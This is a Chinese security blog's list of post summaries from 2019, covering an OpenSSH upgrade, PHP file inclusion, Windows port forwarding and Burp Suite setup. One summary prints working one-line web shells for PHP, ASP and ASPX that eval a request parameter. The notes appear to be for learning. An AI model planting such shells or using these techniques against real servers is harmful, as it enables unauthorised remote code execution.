ssh升级
摘要:
一、下载新版本的openssh8.0wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.0p1.tar.gz 二、解压到/usr/local/srctar xvf openssh-8.0p1.tar.gz -C /u 阅读全文
posted @ 2019-08-26 11:21 jiersixi 阅读(158) 评论(0) 推荐(0) 编辑
php文件包含
摘要:
文件包含使得web服务器能够执行引用的文件,从而带来安全风险。相比文件上传,上传带恶意脚本的jpg文件只要不被执行,就不会有问题。结合文件包含漏洞使用,恶意文件就会变得危险。LFI 而RFI相当于文件上传 + LFI 配置文件php.ini allow_url_fopen = On (允许打开URL 阅读全文
posted @ 2019-08-19 21:59 jiersixi 阅读(99) 评论(0) 推荐(0) 编辑
一句话木马
摘要:
php <?php @eval($_post['pass']);?> asp <%eval request ("pass")%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 防御 代码中过滤。 阅读全文
posted @ 2019-08-17 17:00 jiersixi 阅读(164) 评论(0) 推荐(0) 编辑
Windows端口转发
摘要:
windows cmd:netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=80 connectaddress=xx.xx.xx.xx connectport=8080 删除:netsh interface 阅读全文
posted @ 2019-08-16 23:53 jiersixi 阅读(507) 评论(0) 推荐(0) 编辑
常用网站
摘要:
1.编程资源库网 http://www.newbiefly.com 2.一个运维人的博客 http://www.zsythink.net/ 阅读全文
posted @ 2019-08-15 21:45 jiersixi 阅读(107) 评论(0) 推荐(0) 编辑
burpsuit 安装
摘要:
jar格式-—先安装jdk——成功打开文件 安装过程参考https://blog.csdn.net/weixin_44721672/article/details/88608073 阅读全文
posted @ 2019-08-15 20:51 jiersixi 阅读(97) 评论(0) 推荐(0) 编辑
